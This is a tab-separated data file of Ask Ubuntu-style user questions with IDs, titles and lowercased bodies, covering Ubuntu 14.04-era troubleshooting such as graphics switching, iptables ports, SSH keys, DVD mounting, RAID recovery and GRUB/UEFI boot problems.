-config_aufs_sbilist=y - # config_aufs_shwh is not set ... -config_overlayfs_fs=m
509118	can not install skype 4.3 on ubuntu 14.04	whenever i upgrade to skype 4.3 it still opens skype 4.2 please help !
509119	problem with switch between graphics	i have ubuntu 14.04 64bit ! and installed that on pavilion dv6 3300se the problem is i cant switch between graphics cards : ( or install the amd graphic this is some information : uname -a : 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux glxinfo | grep opengl : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ironlake mobile opengl version string : 2.1 mesa 10.1.0 opengl shading language version string : 1.20 opengl extensions : my first graphic card : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) second : 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] i test all of methods on net to install the amd graphic card with hybrid muxed system but after all install i got error `` low graphic '' ! and i tried to switch to amd graphic but system not change the graphic card . i use this script ( with some change in it ) : http : //asusm51ta-with-linux.blogspot.fr/ but still not work ! . finally plz help me to install the amd graphic and switch between them !
509120	open port 8080 on 14.04	i need to insert into iptables to open 8080 . with the iptables i looked at iptables -l it is so complicated and has many division i am not sure where to put the rule to open the port . here is my iptables -l output : chain input ( policy accept ) target prot opt source destination accept all -- anywhere anywhere ctstate related , established accept all -- anywhere anywhere input_direct all -- anywhere anywhere input_zones_source all -- anywhere anywhere input_zones all -- anywhere anywhere accept icmp -- anywhere anywhere reject all -- anywhere anywhere reject-with icmp-host-prohibited chain forward ( policy accept ) target prot opt source destination accept all -- anywhere anywhere ctstate related , established accept all -- anywhere anywhere forward_direct all -- anywhere anywhere forward_in_zones_source all -- anywhere anywhere forward_in_zones all -- anywhere anywhere forward_out_zones_source all -- anywhere anywhere forward_out_zones all -- anywhere anywhere accept icmp -- anywhere anywhere reject all -- anywhere anywhere reject-with icmp-host-prohibited chain output ( policy accept ) target prot opt source destination output_direct all -- anywhere anywhere chain forward_in_zones ( 1 references ) target prot opt source destination fwdi_public all -- anywhere anywhere fwdi_public all -- anywhere anywhere chain forward_in_zones_source ( 1 references ) target prot opt source destination chain forward_out_zones ( 1 references ) target prot opt source destination fwdo_public all -- anywhere anywhere fwdo_public all -- anywhere anywhere chain forward_out_zones_source ( 1 references ) target prot opt source destination chain forward_direct ( 1 references ) target prot opt source destination chain fwdi_public ( 2 references ) target prot opt source destination fwdi_public_log all -- anywhere anywhere fwdi_public_deny all -- anywhere anywhere fwdi_public_allow all -- anywhere anywhere chain fwdi_public_allow ( 1 references ) target prot opt source destination chain fwdi_public_deny ( 1 references ) target prot opt source destination chain fwdi_public_log ( 1 references ) target prot opt source destination chain fwdo_external ( 0 references ) target prot opt source destination fwdo_external_log all -- anywhere anywhere fwdo_external_deny all -- anywhere anywhere fwdo_external_allow all -- anywhere anywhere chain fwdo_external_allow ( 1 references ) target prot opt source destination accept all -- anywhere anywhere chain fwdo_external_deny ( 1 references ) target prot opt source destination chain fwdo_external_log ( 1 references ) target prot opt source destination chain fwdo_public ( 2 references ) target prot opt source destination fwdo_public_log all -- anywhere anywhere fwdo_public_deny all -- anywhere anywhere fwdo_public_allow all -- anywhere anywhere chain fwdo_public_allow ( 1 references ) target prot opt source destination chain fwdo_public_deny ( 1 references ) target prot opt source destination chain fwdo_public_log ( 1 references ) target prot opt source destination chain input_zones ( 1 references ) target prot opt source destination in_public all -- anywhere anywhere in_public all -- anywhere anywhere chain input_zones_source ( 1 references ) target prot opt source destination chain input_direct ( 1 references ) target prot opt source destination chain in_dmz ( 0 references ) target prot opt source destination in_dmz_log all -- anywhere anywhere in_dmz_deny all -- anywhere anywhere in_dmz_allow all -- anywhere anywhere chain in_dmz_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new chain in_dmz_deny ( 1 references ) target prot opt source destination chain in_dmz_log ( 1 references ) target prot opt source destination chain in_external ( 0 references ) target prot opt source destination in_external_log all -- anywhere anywhere in_external_deny all -- anywhere anywhere in_external_allow all -- anywhere anywhere chain in_external_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new chain in_external_deny ( 1 references ) target prot opt source destination chain in_external_log ( 1 references ) target prot opt source destination chain in_home ( 0 references ) target prot opt source destination in_home_log all -- anywhere anywhere in_home_deny all -- anywhere anywhere in_home_allow all -- anywhere anywhere chain in_home_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new accept udp -- anywhere anywhere udp dpt : ipp ctstate new accept udp -- anywhere 224.0.0.251 udp dpt : mdns ctstate new accept udp -- anywhere anywhere udp dpt : netbios-ns ctstate new accept udp -- anywhere anywhere udp dpt : netbios-dgm ctstate new chain in_home_deny ( 1 references ) target prot opt source destination chain in_home_log ( 1 references ) target prot opt source destination chain in_internal ( 0 references ) target prot opt source destination in_internal_log all -- anywhere anywhere in_internal_deny all -- anywhere anywhere in_internal_allow all -- anywhere anywhere chain in_internal_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new accept udp -- anywhere anywhere udp dpt : ipp ctstate new accept udp -- anywhere 224.0.0.251 udp dpt : mdns ctstate new accept udp -- anywhere anywhere udp dpt : netbios-ns ctstate new accept udp -- anywhere anywhere udp dpt : netbios-dgm ctstate new chain in_internal_deny ( 1 references ) target prot opt source destination chain in_internal_log ( 1 references ) target prot opt source destination chain in_public ( 2 references ) target prot opt source destination in_public_log all -- anywhere anywhere in_public_deny all -- anywhere anywhere in_public_allow all -- anywhere anywhere chain in_public_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new chain in_public_deny ( 1 references ) target prot opt source destination chain in_public_log ( 1 references ) target prot opt source destination chain in_work ( 0 references ) target prot opt source destination in_work_log all -- anywhere anywhere in_work_deny all -- anywhere anywhere in_work_allow all -- anywhere anywhere chain in_work_allow ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh ctstate new accept udp -- anywhere anywhere udp dpt : ipp ctstate new chain in_work_deny ( 1 references ) target prot opt source destination chain in_work_log ( 1 references ) target prot opt source destination chain output_direct ( 1 references ) target prot opt source destination
509121	display problem	having just installed ubuntu 14.04 on my novatech laptop , i find that all display content is larger than it should be . when displaying a single page , i can not view the extremes as they are outside the viewable area of the screen . i tried to see if i could solve the problem by changing the display resolution ( in system settings ) but there were no alternative options to choose from .
509123	intel wireless dual band ac-3160+ubuntu 14.04 not working	i have downloaded iwlwifi-3160-ucode firmware to /lib/firmware , but do n't know what to do next . the wireless connection starts , then stops to ask for password every 5 seconds . lspci -v 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , fast devsel , latency 0 , irq 65 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , fast devsel , latency 0 , irq 66 memory at f7d14000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , medium devsel , latency 0 , irq 59 memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , fast devsel , latency 0 , irq 62 memory at f7d1d000 ( 64-bit , non-prefetchable ) [ size=32 ] capabilities : < access denied > kernel driver in use : mei_me 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , fast devsel , latency 0 , irq 64 memory at f7d10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : f7c00000-f7cfffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000e000-0000efff prefetchable memory behind bridge : 00000000f0000000-00000000f00fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7d1b000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : zotac international ( mco ) ltd. device b213 flags : bus master , 66mhz , medium devsel , latency 0 , irq 60 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7d1a000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) subsystem : zotac international ( mco ) ltd. device b213 flags : medium devsel , irq 3 memory at f7d19000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] 02:00.0 network controller : intel corporation wireless 3160 ( rev 83 ) subsystem : intel corporation dual band wireless-ac 3160 flags : bus master , fast devsel , latency 0 , irq 63 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) subsystem : zotac international ( mco ) ltd. device 8168 flags : bus master , fast devsel , latency 0 , irq 61 i/o ports at e000 [ size=256 ] memory at f0004000 ( 64-bit , prefetchable ) [ size=4k ] memory at f0000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 00:01:2e:56:0e : e8 capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.2.17 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.2.1 dns : 192.168.2.1 - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : disconnected default : no hw address : a0:88:69:35 : f7:28 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points tvname1 : infra , 30:60:23:16 : d4 : f5 , freq 5260 mhz , rate 54 mb/s , strength 40 wpa2 name2 : infra , 18:62:2c : e0:9e : e3 , freq 2412 mhz , rate 54 mb/s , strength 89 wpa2
509124	dvd : no medium found on /dev/sr0 when there is a dvd	i have a nagging problem with ubuntu 14.04 and playing of dvd 's . after installing 14.04 i came to the conclusion that i can not play any dvd 's on ubuntu 14.04 . dvd 's can not even be opened as they are not seen by ubuntu . the data i have until now : in the install of 13.10 this was no problem , so this excludes a hardware problem it 's on 2 installs on 2 different computers . it concerns a ubuntu and lubuntu install the different libdvd libraries are installed : libdvdread4 : version 4.2.1-2ubuntu1 libdvdnav4 : version 4.2.1-3 libdvdcss2 : version 1.2.13-0 ubuntu-restricted-extras : version 60 acidrip : version 0.14-0.2ubuntu7 the dvd is found on /dev/sr0 eject /dev/sr0 does work like a charm sudo mount /dev/sr0 /tmp/dvd makes dvd to in but does n't mount the dvd is found on /dev/sr0 lshw on cdrom gives the dvd player with the when there is a dvd in it ! playing a cd is no problem ls -l /dev/sr0 gives : brw-rw -- -- + 1 root cdrom 11 , 0 aug 9 20:20 /dev/sr0 i am in group cdrom vlc does n't work as does n't acidrip for that matter or mplayer changing regions does n't work as the computer thinks there 's no disc . vlc does n't have problems with encyption ( region ) but just ca n't open /dev/sr0 when using vlc as root it gives the same error , so it wo n't be a rights problem vlc -vvv /dev/sr0 gives a lot and this : libdvdnav : using dvdnav version 4.2.1 libdvdread : could not open /dev/sr0 with libdvdcss . libdvdread : ca n't open /dev/sr0 for reading libdvdnav : vm : failed to open/read the dvd [ 0x7f1d18000e78 ] dvdnav demux warning : can not open dvd ( /dev/sr0 ) so now i am stuck with two installs of ubuntu 14.04 which do n't play any dvd 's . can somebody help and/or ask some questions which lead me to an answer ?
509127	ssh user problem	i am sort of a unix newbie , trying to set ssh for my 12.04 server . i have 2 users in my system one has password the other does not , both are set as admins . my object is have the passwordless user able to ssh with and without password ( that is what my application needs ) i am doing key-gen and trying to copy the key to the server ( local host ) with the user that has password everything seems to work fine - i can ssh without the password prompt after copying the key to the server . but with the passwordless user it fails because i can not copy the key file over . ( did generate the key file under both users - do n't know if that is necessary ) tried passwordauthentication no - that did not work , so commented back to default i do have permitemptypasswords yes - but no help . $ cat ~/.ssh/id_rsa.pub > > ~/.ssh/autorized-keys $ ssh-copy-id -i ~/.ssh/id_rsa.pub user @ localhost asks for password
509128	why am i not getting the result of the addition ?	i have written the following script file from my book . a=2 b=3 c= $ [ a+b ] echo 'the result is : ' $ c after executing this program , instead of getting 5 , i am getting output as : the result is : $ [ a+b ]
509133	how does shotwell detect duplicates ?	could n't find any answers to this with google . when importing the same folder of pictures twice , shotwell will skip duplicate photos . but how does it detect duplicates ? if i import two different folders of pictures , some of which have the same name for some reason , will shotwell assume they are duplicates ? or does it also factor in the file size , making false duplicates unlikely ? or does it hash the pictures , making false duplicates all but impossible ?
509135	skype starts and exits right away	i installed 4.3 skype . when i try to log in , it logs me in , i see a the box appear . then it suddenly switches off . it quits .
509136	errors after hp deskjet 3070a installiation	i have got hp deskjet 3070a printer at home , which i would like to use via wireless network . i have used ubuntu official documentation website how to install it https : //help.ubuntu.com/community/hpallinone install progress went smooth , but it would n't print . running : sudo hp-check -r gives me this long list of errors : missing required dependencies -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error : 'libdbus-1-dev ' package is missing/incompatible error : 'libcups2 ' package is missing/incompatible error : 'openssl ' package is missing/incompatible error : 'libjpeg-dev ' package is missing/incompatible error : 'python-dev ' package is missing/incompatible error : 'libcups2-dev ' package is missing/incompatible error : 'cups-bsd ' package is missing/incompatible error : 'cups-client ' package is missing/incompatible error : 'libsane-dev ' package is missing/incompatible error : 'libusb-1.0.0-dev ' package is missing/incompatible error : 'libcupsimage2-dev ' package is missing/incompatible error : 'libsnmp-dev ' package is missing/incompatible error : 'snmp-mibs-downloader ' package is missing/incompatible missing optional dependencies -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error : 'gtk2-engines-pixbuf ' package is missing/incompatible error : 'xsane ' package is missing/incompatible total errors : 12 total warnings : 1 run 'hp-doctor ' command to prompt and fix the issues . i tried to run `` hp-doctor '' as it suggests , but this is what i get again : error : unable to open /home/justinas/.hplip/hp-doctor.lock lock file .
509144	nginx redirecting to https when it should n't	i have a new site set up , and i think i may have messed something up . if i go to mysite.com , it works , if i go to www.mysite.com , it redirects to https : //www.mysite.com and says 'this webpage is not available ' . if i remove the 's ' from the https , it will redirect to mysite.com . why is it automatically redirecting to https ? i do n't have an ssl , and theres no redirects in the sites-available files . i have 2 folders in my sites-available that the server set up , default , and www.default default : http : //paste.ubuntu.com/8001376/ ( i removed sensitive information ) www.default : server { listen 80 ; server_name www.default ; return 301 $ scheme : //default $ request_uri ; } any idea why if i go to www . it redirects to https : ? thanks for the help .
509147	how to get xbd recognised	there are numerous questions on ubuntu forums about keyboard mapping - clearly many people have this problem - and i 've read a hundred or so answers - all about using gedit to edit the xbd files . ok . so i 've done that - and have a shiny xbd to pin on the wall . but i ca n't type the characters i want to type - because even after making a layout file and putting an entry in evdev.xml - that keyboard remains unchanged and wo n't type what is listed in the layout file . i wonder if any of the many people who have asked this question ever managed to resolve it . is there a distribution that works better as far as xbd files are concerned ?
509150	samba server : network printer share restriction	how can i restrict access to only one out of two printers attached to my ubuntu 10.04 server ? currently , i am using the default configuration ( smb.conf ) slightly adapted , however this is standard setting : [ printers ] comment = all printers browseable = yes path = /var/spool/samba printable = yes guest ok = yes read only = no create mask = 0775 do i need to change the `` path '' ?
509156	how do i enable webgl ?	i 'm going to dive into browser game development and thus i need webgl but it does not work in any browser here on my ubuntu . i 'm using chrome version 36.0.1985.125 and the result on chrome : //gpu are as follows : so i ca n't use webgl and it 's pretty annoying . i googled and followed advices and enabled override software rendering list : but still have no luck . i tried google-chrome -- enable-webgl -- ignore-gpu-blacklist but with no effect . so how can i made this work ? also everythyng work fine on chrome in windows and it also does not work here in ubuntu in firefox 26 . i installed latest nvidia drivers yesrterday but still no effect . what may cause problems ?
509159	why is resume from hibernate not working ?	i have just installed 14.04lts and set up home dir encryption and swap partition encryption using keyfile and luks . all using this guide : link swap is availave and system hibernates . but can not resume from disk , just resume from ram is working . how can i troubleshoot this ?
509162	nonetype object has no attribute get_info ubuntu 14.04	created 350gb partition to install ubunto 14.04 on sony vaio flip 15. getting error `` nonetype object has no attribute get_info '' installing from usb .
509163	ubuntu 12.04 freezes a lot	i have a desktop with ubuntu 12.04 with unity , fresh install about a year ago . details : intel core i5-3570k cpu @ 3.40ghz ă 4 , 4gb ram , 2 tb hd , 64-bit ubuntu 12.04.5 lts kernel : 3.5.0-54-generic ~ $ lspci | grep vga : 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) since about 2 weeks ago my desktop freezes a lot during internet browsing -randomly at any website . it happens on chromium , chrome and firefox , so probably not the browser issue . everything freezes , mouse does not work , keyboard does not work alt+sysrq+reisub does n't work , hard restart is the only option . i am also getting crashes ( not freezes ) - kernel panic , spontaneous reboots , browser crashes . occasionally i get a crash report indicating problem with xorg . today 's crash listed : `` xorg crashed with sigabrt in closewellknownconnections ( ) '' . any ideas ? thanks !
509165	hardware upgrade : hardware vs software raid	i 've decided to upgrade my system disk ( ubuntu 12.04 ) from a 7200 rpm eide hdd to a ssd . but my motherboard only supports 2 sata drives , which are already allocated to a raid-1 array . clearly , i have to add a sata controller , but if i 'm going to do that , would it make more sense to implement a hardware raid instead of doing in software as i 'm doing now ? are there any controllers that are particularly recommended ?
509170	ubuntu touch channel for nexus7 2013	what 's the recommended channel for ubuntu touch on nexus7 2013 . ubuntu touch is working with channel devel , but this results also has a ui for phone . it seems to be a image of phone and not a tablet . so i am not sure whether devel is the correct image for the the nexus7 . in addition , i am also annoyed by the gps which will is enabled all the time . regards , marcel
509174	how can i change the language from english to spanish	i have just installed ubuntu and by mistake i made the installation in english . i would like to change it to spanish . can anybody explain me how to do it , please ? ?
509176	deleted my previous linux partition and now getting stuck at grub boot prompt when i boot from usb/ use `` ubuntu '' option in bios/efi boot menu	let me tell you the full story . i had installed ubuntu and used it . recently i wanted to use windows only ( windows 8.1 ) so , i deleted the linux partitions from the diskmgmt.msc in windows.i also used the easybcd that also didnt work . i can boot into windows without any problem since i have windows boot manager and ubuntu seperate in the efi/eufi boot menu / bios . i want to get rid of the grub 2.0 bootloader thing completely or fix it , whenever i boot from that ubuntu boot option i get the grub2.0 boot prompt ( minimal bash commands etcetc screen ) . i tried many solutions available but many of them might require using a live linux usb , the problem occurs there also , when i boot from the live usb device i get stuck at the same grub 2.0 boot prompt . my main aim is to install another linux operating system . but i cant fix this because i had deleted the linux partitions , so i think the best option is to completely remove the grub itself . p.s : i tride using recovry disk and typing bootrec /fixmb or fixboot etc . i saw many solutions but those where seperate cases so only i started a new forum . please help to install new linux system atleast . edit 1 - i just removed the ubuntu folder in efi partition from windows and the ubuntu option in the bios/eufi page is removed : ) . but when i use a linuxlive usb/bootable usb it again gets stuck at the grub 2.0 boot prompt ( it works in other computer normally )
509179	raid 0 superblock recovery ?	cool , i have a synology diskstation 212j , with 2x3tb drives in raid 0 ( i know , i know , i was very naive ; never had a drive failure before ) . about a month back the volume crashed , i recovered the drive onto a newly bought one using ddrescue and thought i was invincible . cue last week , other drive failed . i laugh to my self , i got this . buy drive , ddrescue , remount . volume is still crashed . oh no . so i start looking around for ways to recover the raid . output as follows : $ sudo lsblk -o name , label , size , fstype , model : name label size fstype model sda 2.7t st3000dm001-1ch1 ├─sda1 2.4g ├─sda2 2g └─sda3 2.7t sdb 2.7t st3000dm001-1ch1 ├─sdb1 2.4g ├─sdb2 2g └─sdb3 2.7t sdc 3.7g dt 101 g2 └─sdc1 3.7g loop0 861m $ sudo mdadm -- examine /dev/sd [ ab ] 3 : /dev/sda3 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : eadcd2bd : ad41fb5c : c00fe094 : e4905f57 name : epimetheus:2 creation time : sun jun 3 10:33:00 2012 raid level : -unknown- raid devices : 0 avail dev size : 5851088833 ( 2790.02 gib 2995.76 gb ) data offset : 2048 sectors super offset : 8 sectors state : active device uuid : 09554089 : a764513d : aabd1978 : dbd5ad81 update time : fri aug 8 18:03:46 2014 checksum : d201d800 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) /dev/sdb3 : magic : a92b4efc version : 1.2 feature map : 0x0 array uuid : eadcd2bd : ad41fb5c : c00fe094 : e4905f57 name : epimetheus:2 creation time : sun jun 3 10:33:00 2012 raid level : -unknown- raid devices : 0 avail dev size : 5851088833 ( 2790.02 gib 2995.76 gb ) data offset : 2048 sectors super offset : 8 sectors state : active device uuid : b1001a70 : a16ec2df : d8d022ba:048ca6d4 update time : fri aug 8 18:03:46 2014 checksum : f04e56f9 - correct events : 1 device role : spare array state : ( 'a ' == active , ' . ' == missing ) $ sudo mdadm -- assemble -- force /dev/md1 /dev/sd [ ab ] 3 mdadm : /dev/md1 assembled from 0 drives and 2 spares - not enough to start the array . $ sudo mount -o ro /dev/md1 /mnt mount : /dev/md1 : ca n't read superblock $ sudo mount -o ro , sb=131072 /dev/md1 /mnt mount : /dev/md1 : ca n't read superblock $ sudo mount -o ro , sb=393216 /dev/md1 /mnt mount : /dev/md1 : ca n't read superblock any thoughts ? ( please ? ) cheers
509181	how to remove stale hard drive entries from cairo dock 'shortcuts ' desklet ?	the machine is running ubuntu 14.04 after multiple distribution upgrades during last 4 years . i use xfce but also have kde installed and have had some other desktop environments installed in the past . i have just replaced the external usb hard drive that i use for backup and edited fstab to suit . the problem is that in the 'shortcuts ' desklet in cairo dock i still have the old hard drive showing up , plus the new hard drive as it was before i partitioned it , plus the new hard drive partitions from before i added them to /etc/fstab . i can not figure out how to clear these stale entries from the desklet . the computer has been rebooted and none of these partitions are present . i have tried : mv ~/.config/cairo-dock ~/.config/cairo-dock.old ( which made no difference ) looking through every file in ~/.config/cairo-dock to search for 'seagate ' as that is one of the referenced drive names gconf-editor and searching for 'seagate' the stale entries do not appear in nautilus or konqueror sidebars or in /etc/fstab or /etc/mtab . how do i clear the cairo dock stale hard drive entries ?
509182	how to install gnome shell extensions without installing ppa repo in 13.10 ?	people had warned me that ppa repositories are not reliable and which can break my system . also themes without ppa would be nice to know how to install with unity and gnome shell . is there a way to install gnome shell and it 's extension without ppa repositories ?
509184	installing grub boot on uefi 64 bit hp laptop	could i clarify an installation choice . i am installing ubuntu 14.04 to an existing w8 installation with 'secure boot ' disabled as i could not get the uefi to pick up the live dvd . there is an existing partition sda2 fat 'efi system ' set up by the original installation . i was encouraged to create a new 'bios boot ' sda5 1mib partition and pointed the installer to 'sda ' . the boot sequence is not automatic and is a mess of selections to eventually get to choose 'boot from hard drive ' which then picks up grub . would it be correct if i deleted the new bios boot partition on the hope that grub will install on the original 'efi syatem ' ( using rescatux live dvd ) ? comments would be appreciated ,
509191	google spreadsheet functionality integrated with the hud ?	i use google spreadsheets a lot . if i could find a way to use google spreadsheets with ubuntu 's hud , i would be a lot more productive . say for example , if i could access the command `` merge cells horizontally '' through the hud , this would improve my workflow manifold . i am looking for any solutions , regardless of how hacky it is .
509193	how to install ubuntu from a flash drive ?	i asked this in a less than clear way before . sorry about that . i have read around a bit but nothing seems clear to me or stands out as a how to do this . so i am looking for a how to . this how to would descrie the tools needed , and the steps to accomplish making an ubuntu install usb . ( not a run ubuntu from usb ) currently i have various sized flash drives no less than 8 gigs . i am running win7-ult . i want to make a completely seperate ubuntu install from this win7 system and drive . to to this i would like to use a usb installer instead of an optical drive and disc . ( for future ease of install and because i am sure that it is a faster process than my sometimes recognized at start up , optical drive . i have read one reply to someone 's post to use unetcootin . that is as far as it goes . i am doing this to a new unused unwritten ssd . so i simply do n't want to waste my first write to the disc screwing things up . thanks in advance .
509196	why does n't this second nohup command run ?	everything runs except the last line : # ! /bin/bash xinput set-prop 11 `` device accel profile '' -1 xinput set-prop 11 `` device accel velocity scaling '' 1 xinput set-prop 11 `` device accel constant deceleration '' 2 nohup java -jar /home/owner/desktop/dropbox/timerapp.jar > /dev/null 2 > & 1 & sleep 5 nohup abiword `` /home/owner/desktop/dropbox/todo.rtf '' > /dev/null 2 > & 1 & i start the script called `` startup.sh '' by double clicking it in nautilus . both `` run in terminal '' and `` run '' produce the same result .
509197	not able to install ubuntu	error log here : http : //paste.ots.me/560746 i am trying to install ubuntu through wubi , and am unsuccessful . i believe this is because my c : drive is corrupt , however that does not make sense to me because i have this installed on my e : drive . any help would be appreciated . okay well due to that `` bad '' word someone edited my post in a really weird way . i want ubuntu installed on c not e , its giving me an error that e is corrupt ( according to the log ) . and my c harddrive is not corrupt . but how can i install ubuntu while keeping windows 7 without using wubi ? `` just install ubuntu in virtual machine and play around with it '' yeah i tried that after i posted this last night , dide n't go that well either . the installer dide n't wan na add 64bit and it dide n't want to start the machine itself . gon na take another look at it today !
509205	computer does n't recognize hard drive for booting windows 8	i 've been trying to install ubuntu on my computer today to dual boot with windows 8.1 . i created a 10 gigabyte partition for ubuntu and then tried to install it . during the installation process , i selected something else . i set aside 1 gigabyte for the swap area and the remaining 9 gigabytes as the ext4 mounted on / . then when i clicked install , it would go to the next page but then a popup message appeared with only question marks and then it went back to the page where it asks how i would like to install ubuntu . at this point , i tried it a few more times and then i decided to give up and come back at another time and so i clicked the restart button in ubuntu . now , whenever my computer boots , it says that there are no bootable devices recognized by the computer . it will only boot when i have the usb with ubuntu on it plugged in . i checked the boot-priority list in my bios and it lists hdd0 as first but it does n't boot to windows when i start my computer . i will try boot-repair now but i just wanted to get this question out there in case it does n't work . i guess i kind of have two questions . the first is how would i get my computer to recognize and boot to the windows partition . the second would be if i proceeded to attempt to dual boot with ubuntu , what steps should i take ? this is my first time working with anything linux related and any help would be greatly appreciated . this is my only computer and i need it for work . thanks in advance ! update here 's the link to the results of my boot-repair http : //paste.ubuntu.com/8003085/
509206	how do i create a bootable windows usb ?	i recently used gparted to resize my partition , so i have 200gb of unallocated space that i want to install windows 7 to . the problem is , my computer wo n't let me boot from usb . it let me boot ubuntu from a usb , but not windows . i 'd been having serious issues even creating a bootable ubuntu usb . startup disk creator , unetbootin ( and unetbootin 494 ) , winusb , etc all did n't work . i kept getting a black screen after the grub , and then returned to the grub . finally , p7zip via the terminal did the trick , and let me boot into try ubuntu , so i could use gparted to partition the hdd . now that i have unallocated space , i want to install windows 7 . i followed the instructions to put my windows iso on a usb via unetbootin , but my computer does n't detect the usb afterwards . the instructions say to format the usb as ntfs , and i did . it detects fat32 , but wo n't boot from it . i tried winusb , but received an error message at the end of it that stated the usb was n't an efi device . i 've turned off secure boot , fast boot , and set the usb to boot priority . can i use p7zip again ? i tried mounting the iso , clicking and dragging the files onto the usb , and booting that way ( which several instructions had said worked ) , but nothing happens . i 'm running out of tools and usbs . i 've used 3 already , including a brand new one . still nothing . i could use some advice ! edit : i tried winusb again with a fresh usb . here 's the error output : installation failed ! exit code : 512 log : formating device ... mounting ... mount : block device /home/zachary/windows7ultimate/windows7ultimate.iso is write- protected , mounting read-only copying ... installing grub ... installing for x86_64-efi platform . grub-install : error : /media/winusb_target_1407629458_2779 does n't look like an efi partition . . error occured ! syncing ... /usr/bin/winusb : line 78 : 7228 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done cleaning ... /usr/bin/winusb : line 78 : 7371 terminated while true ; do sleep 0.05 ; echo 'pulse ' ; done umounting and removing '/media/winusb_iso_1407629458_2779 